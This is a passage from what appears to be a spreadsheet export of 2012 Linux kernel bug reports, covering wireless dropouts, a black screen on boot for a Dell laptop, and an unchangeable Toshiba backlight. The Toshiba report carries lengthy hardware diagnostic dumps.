    <t>Since i've updated my Fedora system I have problems with breaking connection to the internet. Wireless connection is stable for about 5 minutes and than is breaking. I have to switch off and switch on it and then internet is stable for another 5 minutes. Im not really sure about the kernel version with this problem but anyway it's the version of kernel which is now in Fedora 16. I'll check it and update issue if it's wrong. The name of my wireless card is: Linksys Dual-Band Wireless-N PCI Adapter → WMP600N</t>
  </si>
  <si>
    <t>[ILK eDP] Black Screen on Boot for Dell Latitude E6410 Intel HD Graphics (panel power sequencing fail?)</t>
  </si>
  <si>
    <t>3.3.3</t>
  </si>
  <si>
    <t>2012-04-25 17:29 UTC</t>
  </si>
  <si>
    <t>Vincent Frentzel</t>
  </si>
  <si>
    <t>2012-08-20 21:56 UTC</t>
  </si>
  <si>
    <t>On every boot under 3.3.3 the system starts to a black screen. I can login and startx at which point the screen works. When switching display via Xrandr the other monitor works without issue, however going back to the laptop display makes the black screen come back. Switching back and forth between display several times reactivates the laptop display. The system was booting fine in 3.3.1 however xrandr had occasional issues. 3.1.10 was perfect.</t>
  </si>
  <si>
    <t>Brightness unchangeable Toshiba Satellite C660D-10P</t>
  </si>
  <si>
    <t>3.2.0-24-generic</t>
  </si>
  <si>
    <t>2012-04-27 19:29 UTC</t>
  </si>
  <si>
    <t>fireandfuel</t>
  </si>
  <si>
    <t>2012-07-14 15:04 UTC</t>
  </si>
  <si>
    <t>43221 43310</t>
  </si>
  <si>
    <t>[1.] One line summary of the problem: Brightness unchangeable Toshiba Satellite C660D-10P [2.] Full description of the problem/report: Brightness of the display don't change with FN key + F6 / F7 or config applets. It works perfectly with kernel version 3.0.0-17-generic. [3.] Keywords (i.e., modules, networking, kernel): kernel acpi [4.] Kernel version (from /proc/version): Linux version 3.2.0-24-generic (buildd@yellow) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) ) #37-Ubuntu SMP Wed Apr 25 08:43:22 UTC 2012 [5.] Output of Oops.. message (if applicable) with symbolic information: N/A [6.] A small shell script or example program which triggers the problem (if possible): N/A [7.] Environment: Description: Ubuntu 12.04 LTS Release: 12.04 [7.1.] Software (add the output of the ver_linux script here) N/A [7.2.] Processor information (from /proc/cpuinfo): processor : 0 vendor_id : AuthenticAMD cpu family : 16 model : 6 model name : AMD Athlon(tm) II P340 Dual-Core Processor stepping : 3 microcode : 0x10000b6 cpu MHz : 800.000 cache size : 512 KB physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc extd_apicid pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a 3dnowprefetch osvw ibs skinit wdt nodeid_msr npt lbrv svm_lock nrip_save bogomips : 4388.86 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical, 48 bits virtual power management: ts ttp tm stc 100mhzsteps hwpstate processor : 1 vendor_id : AuthenticAMD cpu family : 16 model : 6 model name : AMD Athlon(tm) II P340 Dual-Core Processor stepping : 3 microcode : 0x10000b6 cpu MHz : 800.000 cache size : 512 KB physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt pdpe1gb rdtscp lm 3dnowext 3dnow constant_tsc rep_good nopl nonstop_tsc extd_apicid pni monitor cx16 popcnt lahf_lm cmp_legacy svm extapic cr8_legacy abm sse4a 3dnowprefetch osvw ibs skinit wdt nodeid_msr npt lbrv svm_lock nrip_save bogomips : 4389.03 TLB size : 1024 4K pages clflush size : 64 cache_alignment : 64 address sizes : 48 bits physical, 48 bits virtual power management: ts ttp tm stc 100mhzsteps hwpstate [7.3.] Module information (from /proc/modules): xt_TCPMSS 12707 1 - Live 0x0000000000000000 xt_tcpmss 12501 1 - Live 0x0000000000000000 xt_tcpudp 12603 1 - Live 0x0000000000000000 iptable_mangle 12734 1 - Live 0x0000000000000000 ip_tables 27473 1 iptable_mangle, Live 0x0000000000000000 x_tables 29846 5 xt_TCPMSS,xt_tcpmss,xt_tcpudp,iptable_mangle,ip_tables, Live 0x0000000000000000 pppoe 17875 2 - Live 0x0000000000000000 pppox 13342 1 pppoe, Live 0x0000000000000000 snd_hrtimer 12744 1 - Live 0x0000000000000000 pci_stub 12622 1 - Live 0x0000000000000000 vboxpci 23200 0 - Live 0x0000000000000000 (O) vboxnetadp 13382 0 - Live 0x0000000000000000 (O) vboxnetflt 23441 0 - Live 0x0000000000000000 (O) vboxdrv 287082 3 vboxpci,vboxnetadp,vboxnetflt, Live 0x0000000000000000 (O) parport_pc 32866 0 - Live 0x0000000000000000 bnep 18281 2 - Live 0x0000000000000000 ppdev 17113 0 - Live 0x0000000000000000 rfcomm 47604 0 - Live 0x0000000000000000 bluetooth 180104 10 bnep,rfcomm, Live 0x0000000000000000 nfsd 277809 2 - Live 0x0000000000000000 binfmt_misc 17540 1 - Live 0x0000000000000000 nfs 356307 0 - Live 0x0000000000000000 lockd 86161 2 nfsd,nfs, Live 0x0000000000000000 fscache 61529 1 nfs, Live 0x0000000000000000 auth_rpcgss 53380 2 nfsd,nfs, Live 0x0000000000000000 nfs_acl 12883 2 nfsd,nfs, Live 0x0000000000000000 sunrpc 245464 6 nfsd,nfs,lockd,auth_rpcgss,nfs_acl, Live 0x0000000000000000 dm_crypt 23125 0 - Live 0x0000000000000000 ext2 73795 1 - Live 0x0000000000000000 arc4 12529 2 - Live 0x0000000000000000 joydev 17693 0 - Live 0x0000000000000000 snd_hda_codec_realtek 223867 1 - Live 0x0000000000000000 snd_hda_intel 33773 3 - Live 0x0000000000000000 snd_hda_codec 127706 2 snd_hda_codec_realtek,snd_hda_intel, Live 0x0000000000000000 snd_hwdep 13668 1 snd_hda_codec, Live 0x0000000000000000 snd_pcm 97188 2 snd_hda_intel,snd_hda_codec, Live 0x0000000000000000 snd_seq_midi 13324 0 - Live 0x0000000000000000 snd_rawmidi 30748 1 snd_seq_midi, Live 0x0000000000000000 fglrx 3263886 56 - Live 0x0000000000000000 (P) snd_seq_midi_event 14899 1 snd_seq_midi, Live 0x0000000000000000 snd_seq 61896 3 snd_seq_midi,snd_seq_midi_event, Live 0x0000000000000000 snd_timer 29990 3 snd_hrtimer,snd_pcm,snd_seq, Live 0x0000000000000000 psmouse 87692 0 - Live 0x0000000000000000 snd_seq_device 14540 3 snd_seq_midi,snd_rawmidi,snd_seq, Live 0x0000000000000000 serio_raw 13211 0 - Live 0x0000000000000000 k10temp 13166 0 - Live 0x0000000000000000 rtl8192ce 84826 0 - Live 0x0000000000000000 rtl8192c_common 75767 1 rtl8192ce, Live 0x0000000000000000 rtlwifi 111202 1 rtl8192ce, Live 0x0000000000000000 mac80211 506816 3 rtl8192ce,rtl8192c_common,rtlwifi, Live 0x0000000000000000 snd 78855 16 snd_hda_codec_realtek,snd_hda_intel,snd_hda_codec,snd_hwdep,snd_pcm,snd_rawmidi,snd_seq,snd_timer,snd_seq_device, Live 0x0000000000000000 sp5100_tco 13791 0 - Live 0x0000000000000000 toshiba_acpi 18582 0 - Live 0x0000000000000000 sparse_keymap 13890 1 toshiba_acpi, Live 0x0000000000000000 edac_core 53746 0 - Live 0x0000000000000000 soundcore 15091 1 snd, Live 0x0000000000000000 wmi 19256 1 toshiba_acpi, Live 0x0000000000000000 edac_mce_amd 23709 0 - Live 0x0000000000000000 snd_page_alloc 18529 2 snd_hda_intel,snd_pcm, Live 0x0000000000000000 i2c_piix4 13301 0 - Live 0x0000000000000000 shpchp 37277 0 - Live 0x0000000000000000 cfg80211 205544 2 rtlwifi,mac80211, Live 0x0000000000000000 mac_hid 13253 0 - Live 0x0000000000000000 lp 17799 0 - Live 0x0000000000000000 parport 46562 3 parport_pc,ppdev,lp, Live 0x0000000000000000 uvesafb 29304 1 - Live 0x0000000000000000 usbhid 47199 0 - Live 0x0000000000000000 hid 99559 1 usbhid, Live 0x0000000000000000 video 19596 0 - Live 0x0000000000000000 r8169 62099 0 - Live 0x0000000000000000 [7.4.] Loaded driver and hardware information (/proc/ioports, /proc/iomem): cat /proc/ioports 0000-0cf7 : PCI Bus 0000:00 0000-001f : dma1 0020-0021 : pic1 0040-0043 : timer0 0050-0053 : timer1 0060-0060 : keyboard 0062-0062 : EC data 0064-0064 : keyboard 0066-0066 : EC cmd 0070-0071 : rtc0 0080-008f : dma page reg 00a0-00a1 : pic2 00c0-00df : dma2 00f0-00ff : fpu 03c0-03df : uvesafb 040b-040b : pnp 00:02 04d0-04d1 : pnp 00:02 04d0-04d1 : pnp 00:06 04d6-04d6 : pnp 00:02 0800-089f : pnp 00:02 0800-0803 : ACPI PM1a_EVT_BLK 0804-0805 : ACPI PM1a_CNT_BLK 0808-080b : ACPI PM_TMR 0810-0815 : ACPI CPU throttle 0820-0827 : ACPI GPE0_BLK 0900-090f : pnp 00:02 0910-091f : pnp 00:02 0b00-0b07 : piix4_smbus 0b20-0b3f : pnp 00:02 0c00-0c01 : pnp 00:02 0c14-0c14 : pnp 00:02 0c50-0c51 : pnp 00:02 0c52-0c52 : pnp 00:02 0c6c-0c6c : pnp 00:02 0c6f-0c6f : pnp 00:02 0cd0-0cd1 : pnp 00:02 0cd2-0cd3 : pnp 00:02 0cd4-0cd5 : pnp 00:02 0cd6-0cd7 : pnp 00:02 0cd8-0cdf : pnp 00:02 0cf8-0cff : PCI conf1 0d00-ffff : PCI Bus 0000:00 c000-cfff : PCI Bus 0000:03 c000-c0ff : 0000:03:00.0 c000-c0ff : r8169 d000-dfff : PCI Bus 0000:02 d000-d0ff : 0000:02:00.0 d000-d0ff : rtlwifi e000-efff : PCI Bus 0000:01 e000-e0ff : 0000:01:05.0 f000-f00f : 0000:00:11.0 f000-f00f : ahci f010-f013 : 0000:00:11.0 f010-f013 : ahci f020-f027 : 0000:00:11.0 f020-f027 : ahci f030-f033 : 0000:00:11.0 f030-f033 : ahci f040-f047 : 0000:00:11.0 f040-f047 : ahci fd60-fd6f : pnp 00:06 fe00-fefe : pnp 00:02 cat /proc/iomem 00000000-0000ffff : reserved 00010000-0009ebff : System RAM 0009ec00-0009ffff : reserved 000a0000-000bffff : PCI Bus 0000:00 000c0000-000fffff : PCI Bus 0000:00 000c0000-000cf1ff : Video ROM 000cf800-000d07ff : Adapter ROM 000e0000-000fffff : reserved 000f0000-000fffff : System ROM 00100000-afab3fff : System RAM 01000000-016699ab : Kernel code 016699ac-01ce4fff : Kernel data 01dd3000-01f28fff : Kernel bss a4000000-a7ffffff : GART afab4000-afb37fff : ACPI Non-volatile Storage afb38000-afb48fff : ACPI Tables afb49000-afb49fff : ACPI Non-volatile Storage afb4a000-afb6ffff : reserved afb70000-afb77fff : ACPI Non-volatile Storage afb78000-afb9bfff : reserved afb9c000-afd9efff : ACPI Non-volatile Storage afd9f000-afefffff : System RAM aff00000-affffffe : RAM buffer afffffff-ffffffff : PCI Bus 0000:00 b0000000-bfffffff : pnp 00:0b c0000000-cfffffff : PCI Bus 0000:01 c0000000-cfffffff : 0000:01:05.0 c0000000-c05fffff : uvesafb d0100000-d01fffff : PCI Bus 0000:03 d0100000-d0103fff : 0000:03:00.0 d0100000-d0103fff : r8169 d0104000-d0104fff : 0000:03:00.0 d0104000-d0104fff : r8169 e0000000-efffffff : PCI MMCONFIG 0000 [bus 00-ff] e0000000-efffffff : pnp 00:01 fec00000-fec00fff : reserved fec00000-fec003ff : IOAPIC 0 fec10000-fec10fff : reserved fec10000-fec10fff : pnp 00:02 fed00000-fed00fff : reserved fed00000-fed00fff : pnp 00:02 fed00000-fed003ff : HPET 0 fed61000-fed70fff : reserved fed61000-fed70fff : pnp 00:02 fed80000-fed8ffff : reserved fed80000-fed8ffff : pnp 00:02 fee00000-fee00fff : Local APIC fee00000-fee00fff : pnp 00:02 ff400000-ff5fffff : PCI Bus 0000:01 ff400000-ff4fffff : 0000:01:05.0 ff500000-ff50ffff : 0000:01:05.0 ff600000-ff6fffff : PCI Bus 0000:02 ff600000-ff603fff : 0000:02:00.0 ff600000-ff603fff : rtlwifi ff700000-ff703fff : 0000:00:14.2 ff700000-ff703fff : ICH HD audio ff704000-ff7040ff : 0000:00:13.2 ff704000-ff7040ff : ehci_hcd ff705000-ff705fff : 0000:00:13.0 ff705000-ff705fff : ohci_hcd ff706000-ff7060ff : 0000:00:12.2 ff706000-ff7060ff : ehci_hcd ff707000-ff707fff : 0000:00:12.0 ff707000-ff707fff : ohci_hcd ff708000-ff7083ff : 0000:00:11.0 ff708000-ff7083ff : ahci ff800000-ffffffff : reserved ff800000-ffffffff : pnp 00:02 100001000-13fffffff : System RAM [7.5.] PCI information ('lspci -vvv' as root): 00:00.0 Host bridge: Advanced Micro Devices [AMD] RS880 Host Bridge Subsystem: Toshiba America Info Systems Device fd3c Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort+ &gt;SERR- &lt;PERR- INTx- Latency: 32 Capabilities: [c4] HyperTransport: Slave or Primary Interface Command: BaseUnitID=0 UnitCnt=12 MastHost- DefDir- DUL- Link Control 0: CFlE- CST- CFE- &lt;LkFail- Init+ EOC- TXO- &lt;CRCErr=0 IsocEn- LSEn- ExtCTL- 64b- Link Config 0: MLWI=16bit DwFcIn- MLWO=16bit DwFcOut- LWI=16bit DwFcInEn- LWO=16bit DwFcOutEn- Link Control 1: CFlE- CST- CFE- &lt;LkFail+ Init- EOC+ TXO+ &lt;CRCErr=0 IsocEn- LSEn- ExtCTL- 64b- Link Config 1: MLWI=8bit DwFcIn- MLWO=8bit DwFcOut- LWI=8bit DwFcInEn- LWO=8bit DwFcOutEn- Revision ID: 3.00 Link Frequency 0: 1.6GHz Link Error 0: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 0: 200MHz+ 300MHz- 400MHz+ 500MHz- 600MHz+ 800MHz+ 1.0GHz+ 1.2GHz- 1.4GHz- 1.6GHz- Vend- Feature Capability: IsocFC- LDTSTOP+ CRCTM- ECTLT- 64bA- UIDRD- Link Frequency 1: 200MHz Link Error 1: &lt;Prot- &lt;Ovfl- &lt;EOC- CTLTm- Link Frequency Capability 1: 200MHz- 300MHz- 400MHz- 500MHz- 600MHz- 800MHz- 1.0GHz- 1.2GHz- 1.4GHz- 1.6GHz- Vend- Error Handling: PFlE- OFlE- PFE- OFE- EOCFE- RFE- CRCFE- SERRFE- CF- RE- PNFE- ONFE- EOCNFE- RNFE- CRCNFE- SERRNFE- Prefetchable memory behind bridge Upper: 00-00 Bus Number: 00 Capabilities: [54] HyperTransport: UnitID Clumping Capabilities: [40] HyperTransport: Retry Mode Capabilities: [9c] HyperTransport: #1a Capabilities: [f8] HyperTransport: #1c 00:01.0 PCI bridge: Toshiba America Info Systems Device 9602 (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 Bus: primary=00, secondary=01, subordinate=01, sec-latency=32 I/O behind bridge: 0000e000-0000efff Memory behind bridge: ff400000-ff5fffff Prefetchable memory behind bridge: 00000000c0000000-00000000cfffffff Secondary status: 66MHz+ FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA+ MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [44] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [b0] Subsystem: Toshiba America Info Systems Device fd3c Kernel modules: shpchp 00:06.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 2) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=02, subordinate=02, sec-latency=0 I/O behind bridge: 0000d000-0000dfff Memory behind bridge: ff600000-ff6fffff Prefetchable memory behind bridge: 00000000fff00000-00000000000fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #3, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot+ LnkCtl: ASPM L1 Enabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #6, PowerLimit 25.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Not Supported, TimeoutDis- ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4151 Capabilities: [b0] Subsystem: Toshiba America Info Systems Device fd3c Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100 v1] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Capabilities: [110 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Kernel driver in use: pcieport Kernel modules: shpchp 00:07.0 PCI bridge: Advanced Micro Devices [AMD] RS780 PCI to PCI bridge (PCIE port 3) (prog-if 00 [Normal decode]) Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 0, Cache Line Size: 64 bytes Bus: primary=00, secondary=03, subordinate=03, sec-latency=0 I/O behind bridge: 0000c000-0000cfff Memory behind bridge: fff00000-000fffff Prefetchable memory behind bridge: 00000000d0100000-00000000d01fffff Secondary status: 66MHz- FastB2B- ParErr- DEVSEL=fast &gt;TAbort- &lt;TAbort- &lt;MAbort- &lt;SERR- &lt;PERR- BridgeCtl: Parity- SERR- NoISA- VGA- MAbort- &gt;Reset- FastB2B- PriDiscTmr- SecDiscTmr- DiscTmrStat- DiscTmrSERREn- Capabilities: [50] Power Management version 3 Flags: PMEClk- DSI- D1- D2- AuxCurrent=0mA PME(D0+,D1-,D2-,D3hot+,D3cold+) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Capabilities: [58] Express (v2) Root Port (Slot+), MSI 00 DevCap: MaxPayload 128 bytes, PhantFunc 0, Latency L0s &lt;64ns, L1 &lt;1us ExtTag+ RBE+ FLReset- DevCtl: Report errors: Correctable- Non-Fatal- Fatal- Unsupported- RlxdOrd- ExtTag- PhantFunc- AuxPwr- NoSnoop+ MaxPayload 128 bytes, MaxReadReq 128 bytes DevSta: CorrErr- UncorrErr- FatalErr- UnsuppReq- AuxPwr- TransPend- LnkCap: Port #4, Speed 5GT/s, Width x1, ASPM L0s L1, Latency L0 &lt;64ns, L1 &lt;1us ClockPM- Surprise- LLActRep+ BwNot+ LnkCtl: ASPM Disabled; RCB 64 bytes Disabled- Retrain- CommClk+ ExtSynch- ClockPM- AutWidDis- BWInt- AutBWInt- LnkSta: Speed 2.5GT/s, Width x1, TrErr- Train- SlotClk+ DLActive+ BWMgmt+ ABWMgmt- SltCap: AttnBtn- PwrCtrl- MRL- AttnInd- PwrInd- HotPlug- Surprise- Slot #7, PowerLimit 25.000W; Interlock- NoCompl+ SltCtl: Enable: AttnBtn- PwrFlt- MRL- PresDet- CmdCplt- HPIrq- LinkChg- Control: AttnInd Unknown, PwrInd Unknown, Power- Interlock- SltSta: Status: AttnBtn- PowerFlt- MRL- CmdCplt- PresDet+ Interlock- Changed: MRL- PresDet+ LinkState+ RootCtl: ErrCorrectable- ErrNon-Fatal- ErrFatal- PMEIntEna- CRSVisible- RootCap: CRSVisible- RootSta: PME ReqID 0000, PMEStatus- PMEPending- DevCap2: Completion Timeout: Not Supported, TimeoutDis- ARIFwd- DevCtl2: Completion Timeout: 50us to 50ms, TimeoutDis- ARIFwd- LnkCtl2: Target Link Speed: 2.5GT/s, EnterCompliance- SpeedDis-, Selectable De-emphasis: -6dB Transmit Margin: Normal Operating Range, EnterModifiedCompliance- ComplianceSOS- Compliance De-emphasis: -6dB LnkSta2: Current De-emphasis Level: -6dB Capabilities: [a0] MSI: Enable+ Count=1/1 Maskable- 64bit- Address: fee0300c Data: 4159 Capabilities: [b0] Subsystem: Toshiba America Info Systems Device fd3c Capabilities: [b8] HyperTransport: MSI Mapping Enable+ Fixed+ Capabilities: [100 v1] Vendor Specific Information: ID=0001 Rev=1 Len=010 &lt;?&gt; Capabilities: [110 v1] Virtual Channel Caps: LPEVC=0 RefClk=100ns PATEntryBits=1 Arb: Fixed- WRR32- WRR64- WRR128- Ctrl: ArbSelect=Fixed Status: InProgress- VC0: Caps: PATOffset=00 MaxTimeSlots=1 RejSnoopTrans- Arb: Fixed+ WRR32- WRR64- WRR128- TWRR128- WRR256- Ctrl: Enable+ ID=0 ArbSelect=Fixed TC/VC=01 Status: NegoPending- InProgress- Kernel driver in use: pcieport Kernel modules: shpchp 00:11.0 SATA controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 SATA Controller [AHCI mode] (prog-if 01 [AHCI 1.0]) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap+ 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32 Interrupt: pin A routed to IRQ 42 Region 0: I/O ports at f040 [size=8] Region 1: I/O ports at f030 [size=4] Region 2: I/O ports at f020 [size=8] Region 3: I/O ports at f010 [size=4] Region 4: I/O ports at f000 [size=16] Region 5: Memory at ff708000 (32-bit, non-prefetchable) [size=1K] Capabilities: [50] MSI: Enable+ Count=1/8 Maskable- 64bit+ Address: 00000000fee0300c Data: 4161 Capabilities: [70] SATA HBA v1.0 InCfgSpace Capabilities: [a4] PCI Advanced Features AFCap: TP+ FLR+ AFCtrl: FLR- AFStatus: TP- Kernel driver in use: ahci 00:12.0 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB OHCI0 Controller (prog-if 10 [OHCI]) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at ff707000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:12.2 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB EHCI Controller (prog-if 20 [EHCI]) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at ff706000 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Capabilities: [e4] Debug port: BAR=1 offset=00e0 Kernel driver in use: ehci_hcd 00:13.0 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB OHCI0 Controller (prog-if 10 [OHCI]) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap- 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 18 Region 0: Memory at ff705000 (32-bit, non-prefetchable) [size=4K] Kernel driver in use: ohci_hcd 00:13.2 USB controller: Advanced Micro Devices [AMD] nee ATI SB7x0/SB8x0/SB9x0 USB EHCI Controller (prog-if 20 [EHCI]) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz+ UDF- FastB2B+ ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin B routed to IRQ 17 Region 0: Memory at ff704000 (32-bit, non-prefetchable) [size=256] Capabilities: [c0] Power Management version 2 Flags: PMEClk- DSI- D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold-) Status: D0 NoSoftRst- PME-Enable- DSel=0 DScale=0 PME- Bridge: PM- B3+ Capabilities: [e4] Debug port: BAR=1 offset=00e0 Kernel driver in use: ehci_hcd 00:14.0 SMBus: Advanced Micro Devices [AMD] nee ATI SBx00 SMBus Controller (rev 42) Control: I/O+ Mem+ BusMaster- SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx+ Status: Cap- 66MHz+ UDF- FastB2B- ParErr- DEVSEL=medium &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Kernel driver in use: piix4_smbus Kernel modules: sp5100_tco, i2c-piix4 00:14.2 Audio device: Advanced Micro Devices [AMD] nee ATI SBx00 Azalia (Intel HDA) (rev 40) Subsystem: Toshiba America Info Systems Device fd3c Control: I/O- Mem+ BusMaster+ SpecCycle- MemWINV- VGASnoop- ParErr- Stepping- SERR- FastB2B- DisINTx- Status: Cap+ 66MHz- UDF- FastB2B- ParErr- DEVSEL=slow &gt;TAbort- &lt;TAbort- &lt;MAbort- &gt;SERR- &lt;PERR- INTx- Latency: 32, Cache Line Size: 64 bytes Interrupt: pin A routed to IRQ 16 Region 0: Memory at ff700000 (64-bit, non-prefetchable) [size=16K] Capabilities: [50] Power Management version 2 